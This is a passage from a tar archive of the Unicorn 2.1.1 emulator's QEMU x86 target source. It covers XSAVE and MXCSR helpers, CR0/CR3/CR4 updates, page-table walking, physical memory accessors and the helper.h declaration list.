(ecx) { case 0: return env->xcr0; case 1: if (env->features[FEAT_XSAVE] & CPUID_XSAVE_XGETBV1) { return env->xcr0 & get_xinuse(env); } break; } raise_exception_ra(env, EXCP0D_GPF, GETPC()); } void helper_xsetbv(CPUX86State *env, uint32_t ecx, uint64_t mask) { uint32_t dummy, ena_lo, ena_hi; uint64_t ena; /* The OS must have enabled XSAVE. */ if (!(env->cr[4] & CR4_OSXSAVE_MASK)) { raise_exception_ra(env, EXCP06_ILLOP, GETPC()); } /* Only XCR0 is defined at present; the FPU may not be disabled. */ if (ecx != 0 || (mask & XSTATE_FP_MASK) == 0) { goto do_gpf; } /* Disallow enabling unimplemented features. */ cpu_x86_cpuid(env, 0x0d, 0, &ena_lo, &dummy, &dummy, &ena_hi); ena = ((uint64_t)ena_hi << 32) | ena_lo; if (mask & ~ena) { goto do_gpf; } /* Disallow enabling only half of MPX. 
*/ if ((mask ^ (mask * (XSTATE_BNDCSR_MASK / XSTATE_BNDREGS_MASK))) & XSTATE_BNDCSR_MASK) { goto do_gpf; } env->xcr0 = mask; cpu_sync_bndcs_hflags(env); return; do_gpf: raise_exception_ra(env, EXCP0D_GPF, GETPC()); } /* MMX/SSE */ /* XXX: optimize by storing fptt and fptags in the static cpu state */ #define SSE_DAZ 0x0040 #define SSE_RC_MASK 0x6000 #define SSE_RC_NEAR 0x0000 #define SSE_RC_DOWN 0x2000 #define SSE_RC_UP 0x4000 #define SSE_RC_CHOP 0x6000 #define SSE_FZ 0x8000 void update_mxcsr_status(CPUX86State *env) { uint32_t mxcsr = env->mxcsr; int rnd_type; /* set rounding mode */ switch (mxcsr & SSE_RC_MASK) { default: case SSE_RC_NEAR: rnd_type = float_round_nearest_even; break; case SSE_RC_DOWN: rnd_type = float_round_down; break; case SSE_RC_UP: rnd_type = float_round_up; break; case SSE_RC_CHOP: rnd_type = float_round_to_zero; break; } set_float_rounding_mode(rnd_type, &env->sse_status); /* set denormals are zero */ set_flush_inputs_to_zero((mxcsr & SSE_DAZ) ? 1 : 0, &env->sse_status); /* set flush to zero */ set_flush_to_zero((mxcsr & SSE_FZ) ? 1 : 0, &env->fp_status); } void helper_ldmxcsr(CPUX86State *env, uint32_t val) { cpu_set_mxcsr(env, val); } void helper_enter_mmx(CPUX86State *env) { env->fpstt = 0; *(uint32_t *)(env->fptags) = 0; *(uint32_t *)(env->fptags + 4) = 0; } void helper_emms(CPUX86State *env) { /* set to empty state */ *(uint32_t *)(env->fptags) = 0x01010101; *(uint32_t *)(env->fptags + 4) = 0x01010101; } /* XXX: suppress */ void helper_movq(CPUX86State *env, void *d, void *s) { *(uint64_t *)d = *(uint64_t *)s; } #define SHIFT 0 #include "ops_sse.h" #define SHIFT 1 #include "ops_sse.h" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/helper.c�������������������������������������������������������������0000664�0000000�0000000�00000036027�14675241067�0017565�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * i386 helpers (without register variable usage) * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "sysemu/tcg.h" void cpu_sync_bndcs_hflags(CPUX86State *env) { uint32_t hflags = env->hflags; uint32_t hflags2 = env->hflags2; uint32_t bndcsr; if ((hflags & HF_CPL_MASK) == 3) { bndcsr = env->bndcs_regs.cfgu; } else { bndcsr = env->msr_bndcfgs; } if ((env->cr[4] & CR4_OSXSAVE_MASK) && (env->xcr0 & XSTATE_BNDCSR_MASK) && (bndcsr & BNDCFG_ENABLE)) { hflags |= HF_MPX_EN_MASK; } else { hflags &= ~HF_MPX_EN_MASK; } if (bndcsr & BNDCFG_BNDPRESERVE) { hflags2 |= HF2_MPX_PR_MASK; } else { hflags2 &= ~HF2_MPX_PR_MASK; } env->hflags = hflags; env->hflags2 = hflags2; } static void cpu_x86_version(CPUX86State *env, int *family, int *model) { int cpuver = env->cpuid_version; if (family == NULL || model == NULL) { return; } *family = (cpuver >> 8) & 0x0f; *model = ((cpuver >> 12) & 0xf0) + ((cpuver >> 4) & 0x0f); } /* Broadcast MCA signal for processor version 06H_EH and above */ int cpu_x86_support_mca_broadcast(CPUX86State *env) { int family = 0; int model = 0; cpu_x86_version(env, &family, &model); if ((family == 6 && model >= 14) || family > 6) { return 1; } return 0; } /***********************************************************/ /* x86 mmu */ /* XXX: add PGE support */ void x86_cpu_set_a20(X86CPU *cpu, int a20_state) { CPUX86State *env = &cpu->env; a20_state = (a20_state != 0); if (a20_state != ((env->a20_mask >> 20) & 1)) { CPUState *cs = CPU(cpu); qemu_log_mask(CPU_LOG_MMU, "A20 update: a20=%d\n", a20_state); /* if the cpu is currently executing code, we must unlink it and all the potentially executing TB */ cpu_interrupt(cs, CPU_INTERRUPT_EXITTB); /* when a20 is changed, all the MMU mappings are invalid, so we must flush everything */ tlb_flush(cs); env->a20_mask = ~(1 << 20) | (a20_state << 20); } } void cpu_x86_update_cr0(CPUX86State *env, uint32_t new_cr0) { X86CPU *cpu = env_archcpu(env); int pe_state; qemu_log_mask(CPU_LOG_MMU, "CR0 update: CR0=0x%08x\n", new_cr0); if ((new_cr0 & (CR0_PG_MASK | CR0_WP_MASK | CR0_PE_MASK)) != (env->cr[0] & (CR0_PG_MASK | CR0_WP_MASK | CR0_PE_MASK))) { tlb_flush(CPU(cpu)); } #ifdef TARGET_X86_64 if (!(env->cr[0] & CR0_PG_MASK) && (new_cr0 & CR0_PG_MASK) && (env->efer & MSR_EFER_LME)) { /* enter in long mode */ /* XXX: generate an exception */ if (!(env->cr[4] & CR4_PAE_MASK)) return; env->efer |= MSR_EFER_LMA; env->hflags |= HF_LMA_MASK; } else if ((env->cr[0] & CR0_PG_MASK) && !(new_cr0 & CR0_PG_MASK) && (env->efer & MSR_EFER_LMA)) { /* exit long mode */ env->efer &= ~MSR_EFER_LMA; env->hflags &= ~(HF_LMA_MASK | HF_CS64_MASK); env->eip &= 0xffffffff; } #endif env->cr[0] = new_cr0 | CR0_ET_MASK; /* update PE flag in hidden flags */ pe_state = (env->cr[0] & CR0_PE_MASK); env->hflags = (env->hflags & ~HF_PE_MASK) | (pe_state << HF_PE_SHIFT); /* ensure that ADDSEG is always set in real mode */ env->hflags |= ((pe_state ^ 1) << HF_ADDSEG_SHIFT); /* update FPU flags */ env->hflags = (env->hflags & ~(HF_MP_MASK | HF_EM_MASK | HF_TS_MASK)) | ((new_cr0 << (HF_MP_SHIFT - 1)) & (HF_MP_MASK | HF_EM_MASK | HF_TS_MASK)); } /* XXX: in legacy PAE mode, generate a GPF if reserved bits are set in the PDPT */ void cpu_x86_update_cr3(CPUX86State *env, target_ulong new_cr3) { env->cr[3] = new_cr3; if (env->cr[0] & CR0_PG_MASK) { qemu_log_mask(CPU_LOG_MMU, "CR3 update: CR3=" TARGET_FMT_lx "\n", new_cr3); tlb_flush(env_cpu(env)); } } void cpu_x86_update_cr4(CPUX86State *env, uint32_t new_cr4) { uint32_t hflags; #if defined(DEBUG_MMU) printf("CR4 update: %08x -> %08x\n", (uint32_t)env->cr[4], new_cr4); 
#endif if ((new_cr4 ^ env->cr[4]) & (CR4_PGE_MASK | CR4_PAE_MASK | CR4_PSE_MASK | CR4_SMEP_MASK | CR4_SMAP_MASK | CR4_LA57_MASK)) { tlb_flush(env_cpu(env)); } /* Clear bits we're going to recompute. */ hflags = env->hflags & ~(HF_OSFXSR_MASK | HF_SMAP_MASK); /* SSE handling */ if (!(env->features[FEAT_1_EDX] & CPUID_SSE)) { new_cr4 &= ~CR4_OSFXSR_MASK; } if (new_cr4 & CR4_OSFXSR_MASK) { hflags |= HF_OSFXSR_MASK; } if (!(env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_SMAP)) { new_cr4 &= ~CR4_SMAP_MASK; } if (new_cr4 & CR4_SMAP_MASK) { hflags |= HF_SMAP_MASK; } if (!(env->features[FEAT_7_0_ECX] & CPUID_7_0_ECX_PKU)) { new_cr4 &= ~CR4_PKE_MASK; } env->cr[4] = new_cr4; env->hflags = hflags; cpu_sync_bndcs_hflags(env); } hwaddr x86_cpu_get_phys_page_attrs_debug(CPUState *cs, vaddr addr, MemTxAttrs *attrs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; target_ulong pde_addr, pte_addr; uint64_t pte; int32_t a20_mask; uint32_t page_offset; int page_size; *attrs = cpu_get_mem_attrs(env); a20_mask = x86_get_a20_mask(env); if (!(env->cr[0] & CR0_PG_MASK)) { pte = addr & a20_mask; page_size = 4096; } else if (env->cr[4] & CR4_PAE_MASK) { target_ulong pdpe_addr; uint64_t pde, pdpe; #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { bool la57 = env->cr[4] & CR4_LA57_MASK; uint64_t pml5e_addr, pml5e; uint64_t pml4e_addr, pml4e; int32_t sext; /* test virtual address sign extension */ sext = la57 ? (int64_t)addr >> 56 : (int64_t)addr >> 47; if (sext != 0 && sext != -1) { return -1; } if (la57) { pml5e_addr = ((env->cr[3] & ~0xfff) + (((addr >> 48) & 0x1ff) << 3)) & a20_mask; pml5e = x86_ldq_phys(cs, pml5e_addr); if (!(pml5e & PG_PRESENT_MASK)) { return -1; } } else { pml5e = env->cr[3]; } pml4e_addr = ((pml5e & PG_ADDRESS_MASK) + (((addr >> 39) & 0x1ff) << 3)) & a20_mask; pml4e = x86_ldq_phys(cs, pml4e_addr); if (!(pml4e & PG_PRESENT_MASK)) { return -1; } pdpe_addr = ((pml4e & PG_ADDRESS_MASK) + (((addr >> 30) & 0x1ff) << 3)) & a20_mask; pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { return -1; } if (pdpe & PG_PSE_MASK) { page_size = 1024 * 1024 * 1024; pte = pdpe; goto out; } } else #endif { pdpe_addr = ((env->cr[3] & ~0x1f) + ((addr >> 27) & 0x18)) & a20_mask; pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) return -1; } pde_addr = ((pdpe & PG_ADDRESS_MASK) + (((addr >> 21) & 0x1ff) << 3)) & a20_mask; pde = x86_ldq_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { return -1; } if (pde & PG_PSE_MASK) { /* 2 MB page */ page_size = 2048 * 1024; pte = pde; } else { /* 4 KB page */ pte_addr = ((pde & PG_ADDRESS_MASK) + (((addr >> 12) & 0x1ff) << 3)) & a20_mask; page_size = 4096; pte = x86_ldq_phys(cs, pte_addr); } if (!(pte & PG_PRESENT_MASK)) { return -1; } } else { uint32_t pde; /* page directory entry */ pde_addr = ((env->cr[3] & ~0xfff) + ((addr >> 20) & 0xffc)) & a20_mask; pde = x86_ldl_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) return -1; if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { pte = pde | ((pde & 0x1fe000LL) << (32 - 13)); page_size = 4096 * 1024; } else { /* page directory entry */ pte_addr = ((pde & ~0xfff) + ((addr >> 10) & 0xffc)) & a20_mask; pte = x86_ldl_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { return -1; } page_size = 4096; } pte = pte & a20_mask; } #ifdef TARGET_X86_64 out: #endif pte &= PG_ADDRESS_MASK & ~(page_size - 1); page_offset = (addr & TARGET_PAGE_MASK) & (page_size - 1); return pte | page_offset; } int cpu_x86_get_descr_debug(CPUX86State *env, unsigned int selector, target_ulong *base, unsigned 
int *limit, unsigned int *flags) { CPUState *cs = env_cpu(env); SegmentCache *dt; target_ulong ptr; uint32_t e1, e2; int index; if (selector & 0x4) dt = &env->ldt; else dt = &env->gdt; index = selector & ~7; ptr = dt->base + index; if ((index + 7) > dt->limit || cpu_memory_rw_debug(cs, ptr, (uint8_t *)&e1, sizeof(e1), 0) != 0 || cpu_memory_rw_debug(cs, ptr+4, (uint8_t *)&e2, sizeof(e2), 0) != 0) return 0; *base = ((e1 >> 16) | ((e2 & 0xff) << 16) | (e2 & 0xff000000)); *limit = (e1 & 0xffff) | (e2 & 0x000f0000); if (e2 & DESC_G_MASK) *limit = (*limit << 12) | 0xfff; *flags = e2; return 1; } void do_cpu_init(X86CPU *cpu) { CPUState *cs = CPU(cpu); CPUX86State *env = &cpu->env; CPUX86State *save = g_new(CPUX86State, 1); int sipi = cs->interrupt_request & CPU_INTERRUPT_SIPI; *save = *env; cpu_reset(cs); cs->interrupt_request = sipi; memcpy(&env->start_init_save, &save->start_init_save, offsetof(CPUX86State, end_init_save) - offsetof(CPUX86State, start_init_save)); g_free(save); // apic_init_reset(cpu->apic_state); } void do_cpu_sipi(X86CPU *cpu) { // apic_sipi(cpu->apic_state); } /* Frob eflags into and out of the CPU temporary format. */ void x86_cpu_exec_enter(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; CC_SRC = env->eflags & (CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); env->df = 1 - (2 * ((env->eflags >> 10) & 1)); CC_OP = CC_OP_EFLAGS; env->eflags &= ~(DF_MASK | CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); } void x86_cpu_exec_exit(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; env->eflags = cpu_compute_eflags(env); } uint8_t x86_ldub_phys(CPUState *cs, hwaddr addr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_ldub, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, attrs, NULL); #else return address_space_ldub(as->uc, as, addr, attrs, NULL); #endif } uint32_t x86_lduw_phys(CPUState *cs, hwaddr addr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_lduw, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, attrs, NULL); #else return address_space_lduw(as->uc, as, addr, attrs, NULL); #endif } uint32_t x86_ldl_phys(CPUState *cs, hwaddr addr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, attrs, NULL); #else return address_space_ldl(as->uc, as, addr, attrs, NULL); #endif } uint64_t x86_ldq_phys(CPUState *cs, hwaddr addr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, attrs, NULL); #else return address_space_ldq(as->uc, as, addr, attrs, NULL); #endif } void x86_stb_phys(CPUState *cs, hwaddr addr, uint8_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stb, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stb(as->uc, as, addr, val, attrs, NULL); #endif } void 
x86_stl_phys_notdirty(CPUState *cs, hwaddr addr, uint32_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stl_notdirty, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stl_notdirty(as->uc, as, addr, val, attrs, NULL); #endif } void x86_stw_phys(CPUState *cs, hwaddr addr, uint32_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stw,UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stw(as->uc, as, addr, val, attrs, NULL); #endif } void x86_stl_phys(CPUState *cs, hwaddr addr, uint32_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stl, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stl(as->uc, as, addr, val, attrs, NULL); #endif } void x86_stq_phys(CPUState *cs, hwaddr addr, uint64_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stq, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stq(as->uc, as, addr, val, attrs, NULL); #endif } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/helper.h�������������������������������������������������������������0000664�0000000�0000000�00000020250�14675241067�0017561�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_FLAGS_4(cc_compute_all, TCG_CALL_NO_RWG_SE, tl, tl, tl, tl, int) DEF_HELPER_FLAGS_4(cc_compute_c, TCG_CALL_NO_RWG_SE, tl, tl, tl, tl, int) DEF_HELPER_3(write_eflags, void, env, tl, i32) DEF_HELPER_1(read_eflags, tl, env) DEF_HELPER_2(divb_AL, void, env, tl) DEF_HELPER_2(idivb_AL, void, env, tl) DEF_HELPER_2(divw_AX, void, env, tl) DEF_HELPER_2(idivw_AX, void, env, tl) DEF_HELPER_2(divl_EAX, void, env, tl) DEF_HELPER_2(idivl_EAX, void, env, tl) #ifdef TARGET_X86_64 DEF_HELPER_2(divq_EAX, void, env, tl) DEF_HELPER_2(idivq_EAX, void, env, tl) #endif DEF_HELPER_FLAGS_2(cr4_testbit, TCG_CALL_NO_WG, void, env, i32) DEF_HELPER_FLAGS_2(bndck, TCG_CALL_NO_WG, void, env, i32) DEF_HELPER_FLAGS_3(bndldx32, TCG_CALL_NO_WG, i64, env, tl, tl) DEF_HELPER_FLAGS_3(bndldx64, TCG_CALL_NO_WG, i64, env, tl, tl) DEF_HELPER_FLAGS_5(bndstx32, 
TCG_CALL_NO_WG, void, env, tl, tl, i64, i64) DEF_HELPER_FLAGS_5(bndstx64, TCG_CALL_NO_WG, void, env, tl, tl, i64, i64) DEF_HELPER_1(bnd_jmp, void, env) DEF_HELPER_2(aam, void, env, int) DEF_HELPER_2(aad, void, env, int) DEF_HELPER_1(aaa, void, env) DEF_HELPER_1(aas, void, env) DEF_HELPER_1(daa, void, env) DEF_HELPER_1(das, void, env) DEF_HELPER_2(lsl, tl, env, tl) DEF_HELPER_2(lar, tl, env, tl) DEF_HELPER_2(verr, void, env, tl) DEF_HELPER_2(verw, void, env, tl) DEF_HELPER_2(lldt, void, env, int) DEF_HELPER_2(ltr, void, env, int) DEF_HELPER_3(load_seg, void, env, int, int) DEF_HELPER_4(ljmp_protected, void, env, int, tl, tl) DEF_HELPER_5(lcall_real, void, env, int, tl, int, int) DEF_HELPER_5(lcall_protected, void, env, int, tl, int, tl) DEF_HELPER_2(iret_real, void, env, int) DEF_HELPER_3(iret_protected, void, env, int, int) DEF_HELPER_3(lret_protected, void, env, int, int) DEF_HELPER_2(read_crN, tl, env, int) DEF_HELPER_3(write_crN, void, env, int, tl) DEF_HELPER_2(lmsw, void, env, tl) DEF_HELPER_1(clts, void, env) DEF_HELPER_FLAGS_3(set_dr, TCG_CALL_NO_WG, void, env, int, tl) DEF_HELPER_FLAGS_2(get_dr, TCG_CALL_NO_WG, tl, env, int) DEF_HELPER_2(invlpg, void, env, tl) DEF_HELPER_2(sysenter, void, env, int) DEF_HELPER_2(sysexit, void, env, int) #ifdef TARGET_X86_64 DEF_HELPER_2(syscall, void, env, int) DEF_HELPER_2(sysret, void, env, int) #endif DEF_HELPER_2(hlt, void, env, int) DEF_HELPER_2(monitor, void, env, tl) DEF_HELPER_2(mwait, void, env, int) DEF_HELPER_2(pause, void, env, int) DEF_HELPER_1(debug, void, env) DEF_HELPER_1(reset_rf, void, env) DEF_HELPER_3(raise_interrupt, void, env, int, int) DEF_HELPER_2(raise_exception, void, env, int) DEF_HELPER_1(cli, void, env) DEF_HELPER_1(sti, void, env) DEF_HELPER_1(clac, void, env) DEF_HELPER_1(stac, void, env) DEF_HELPER_3(boundw, void, env, tl, int) DEF_HELPER_3(boundl, void, env, tl, int) DEF_HELPER_1(rsm, void, env) DEF_HELPER_2(into, void, env, int) DEF_HELPER_2(cmpxchg8b_unlocked, void, env, tl) DEF_HELPER_2(cmpxchg8b, void, env, tl) #ifdef TARGET_X86_64 DEF_HELPER_2(cmpxchg16b_unlocked, void, env, tl) DEF_HELPER_2(cmpxchg16b, void, env, tl) #endif DEF_HELPER_1(single_step, void, env) DEF_HELPER_1(rechecking_single_step, void, env) DEF_HELPER_1(cpuid, void, env) DEF_HELPER_1(rdtsc, void, env) DEF_HELPER_1(rdtscp, void, env) DEF_HELPER_1(rdpmc, void, env) DEF_HELPER_1(rdmsr, void, env) DEF_HELPER_1(wrmsr, void, env) DEF_HELPER_2(check_iob, void, env, i32) DEF_HELPER_2(check_iow, void, env, i32) DEF_HELPER_2(check_iol, void, env, i32) DEF_HELPER_3(outb, void, env, i32, i32) DEF_HELPER_2(inb, tl, env, i32) DEF_HELPER_3(outw, void, env, i32, i32) DEF_HELPER_2(inw, tl, env, i32) DEF_HELPER_3(outl, void, env, i32, i32) DEF_HELPER_2(inl, tl, env, i32) DEF_HELPER_FLAGS_4(bpt_io, TCG_CALL_NO_WG, void, env, i32, i32, tl) DEF_HELPER_3(svm_check_intercept_param, void, env, i32, i64) DEF_HELPER_4(svm_check_io, void, env, i32, i32, i32) DEF_HELPER_3(vmrun, void, env, int, int) DEF_HELPER_1(vmmcall, void, env) DEF_HELPER_2(vmload, void, env, int) DEF_HELPER_2(vmsave, void, env, int) DEF_HELPER_1(stgi, void, env) DEF_HELPER_1(clgi, void, env) DEF_HELPER_1(skinit, void, env) DEF_HELPER_2(invlpga, void, env, int) /* x86 FPU */ DEF_HELPER_2(flds_FT0, void, env, i32) DEF_HELPER_2(fldl_FT0, void, env, i64) DEF_HELPER_2(fildl_FT0, void, env, s32) DEF_HELPER_2(flds_ST0, void, env, i32) DEF_HELPER_2(fldl_ST0, void, env, i64) DEF_HELPER_2(fildl_ST0, void, env, s32) DEF_HELPER_2(fildll_ST0, void, env, s64) DEF_HELPER_1(fsts_ST0, i32, env) DEF_HELPER_1(fstl_ST0, 
i64, env) DEF_HELPER_1(fist_ST0, s32, env) DEF_HELPER_1(fistl_ST0, s32, env) DEF_HELPER_1(fistll_ST0, s64, env) DEF_HELPER_1(fistt_ST0, s32, env) DEF_HELPER_1(fisttl_ST0, s32, env) DEF_HELPER_1(fisttll_ST0, s64, env) DEF_HELPER_2(fldt_ST0, void, env, tl) DEF_HELPER_2(fstt_ST0, void, env, tl) DEF_HELPER_1(fpush, void, env) DEF_HELPER_1(fpop, void, env) DEF_HELPER_1(fdecstp, void, env) DEF_HELPER_1(fincstp, void, env) DEF_HELPER_2(ffree_STN, void, env, int) DEF_HELPER_1(fmov_ST0_FT0, void, env) DEF_HELPER_2(fmov_FT0_STN, void, env, int) DEF_HELPER_2(fmov_ST0_STN, void, env, int) DEF_HELPER_2(fmov_STN_ST0, void, env, int) DEF_HELPER_2(fxchg_ST0_STN, void, env, int) DEF_HELPER_1(fcom_ST0_FT0, void, env) DEF_HELPER_1(fucom_ST0_FT0, void, env) DEF_HELPER_1(fcomi_ST0_FT0, void, env) DEF_HELPER_1(fucomi_ST0_FT0, void, env) DEF_HELPER_1(fadd_ST0_FT0, void, env) DEF_HELPER_1(fmul_ST0_FT0, void, env) DEF_HELPER_1(fsub_ST0_FT0, void, env) DEF_HELPER_1(fsubr_ST0_FT0, void, env) DEF_HELPER_1(fdiv_ST0_FT0, void, env) DEF_HELPER_1(fdivr_ST0_FT0, void, env) DEF_HELPER_2(fadd_STN_ST0, void, env, int) DEF_HELPER_2(fmul_STN_ST0, void, env, int) DEF_HELPER_2(fsub_STN_ST0, void, env, int) DEF_HELPER_2(fsubr_STN_ST0, void, env, int) DEF_HELPER_2(fdiv_STN_ST0, void, env, int) DEF_HELPER_2(fdivr_STN_ST0, void, env, int) DEF_HELPER_1(fchs_ST0, void, env) DEF_HELPER_1(fabs_ST0, void, env) DEF_HELPER_1(fxam_ST0, void, env) DEF_HELPER_1(fld1_ST0, void, env) DEF_HELPER_1(fldl2t_ST0, void, env) DEF_HELPER_1(fldl2e_ST0, void, env) DEF_HELPER_1(fldpi_ST0, void, env) DEF_HELPER_1(fldlg2_ST0, void, env) DEF_HELPER_1(fldln2_ST0, void, env) DEF_HELPER_1(fldz_ST0, void, env) DEF_HELPER_1(fldz_FT0, void, env) DEF_HELPER_1(fnstsw, i32, env) DEF_HELPER_1(fnstcw, i32, env) DEF_HELPER_2(fldcw, void, env, i32) DEF_HELPER_1(fclex, void, env) DEF_HELPER_1(fwait, void, env) DEF_HELPER_1(fninit, void, env) DEF_HELPER_2(fbld_ST0, void, env, tl) DEF_HELPER_2(fbst_ST0, void, env, tl) DEF_HELPER_1(f2xm1, void, env) DEF_HELPER_1(fyl2x, void, env) DEF_HELPER_1(fptan, void, env) DEF_HELPER_1(fpatan, void, env) DEF_HELPER_1(fxtract, void, env) DEF_HELPER_1(fprem1, void, env) DEF_HELPER_1(fprem, void, env) DEF_HELPER_1(fyl2xp1, void, env) DEF_HELPER_1(fsqrt, void, env) DEF_HELPER_1(fsincos, void, env) DEF_HELPER_1(frndint, void, env) DEF_HELPER_1(fscale, void, env) DEF_HELPER_1(fsin, void, env) DEF_HELPER_1(fcos, void, env) DEF_HELPER_3(fstenv, void, env, tl, int) DEF_HELPER_3(fldenv, void, env, tl, int) DEF_HELPER_3(fsave, void, env, tl, int) DEF_HELPER_3(frstor, void, env, tl, int) DEF_HELPER_FLAGS_2(fxsave, TCG_CALL_NO_WG, void, env, tl) DEF_HELPER_FLAGS_2(fxrstor, TCG_CALL_NO_WG, void, env, tl) DEF_HELPER_FLAGS_3(xsave, TCG_CALL_NO_WG, void, env, tl, i64) DEF_HELPER_FLAGS_3(xsaveopt, TCG_CALL_NO_WG, void, env, tl, i64) DEF_HELPER_FLAGS_3(xrstor, TCG_CALL_NO_WG, void, env, tl, i64) DEF_HELPER_FLAGS_2(xgetbv, TCG_CALL_NO_WG, i64, env, i32) DEF_HELPER_FLAGS_3(xsetbv, TCG_CALL_NO_WG, void, env, i32, i64) DEF_HELPER_FLAGS_2(rdpkru, TCG_CALL_NO_WG, i64, env, i32) DEF_HELPER_FLAGS_3(wrpkru, TCG_CALL_NO_WG, void, env, i32, i64) DEF_HELPER_FLAGS_2(pdep, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(pext, TCG_CALL_NO_RWG_SE, tl, tl, tl) /* MMX/SSE */ DEF_HELPER_2(ldmxcsr, void, env, i32) DEF_HELPER_1(enter_mmx, void, env) DEF_HELPER_1(emms, void, env) DEF_HELPER_3(movq, void, env, ptr, ptr) #define SHIFT 0 #include "ops_sse_header.h" #define SHIFT 1 #include "ops_sse_header.h" DEF_HELPER_3(rclb, tl, env, tl, tl) DEF_HELPER_3(rclw, tl, env, tl, 
tl) DEF_HELPER_3(rcll, tl, env, tl, tl) DEF_HELPER_3(rcrb, tl, env, tl, tl) DEF_HELPER_3(rcrw, tl, env, tl, tl) DEF_HELPER_3(rcrl, tl, env, tl, tl) #ifdef TARGET_X86_64 DEF_HELPER_3(rclq, tl, env, tl, tl) DEF_HELPER_3(rcrq, tl, env, tl, tl) #endif DEF_HELPER_1(rdrand, tl, env) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/int_helper.c���������������������������������������������������������0000664�0000000�0000000�00000026750�14675241067�0020441�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 integer helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * 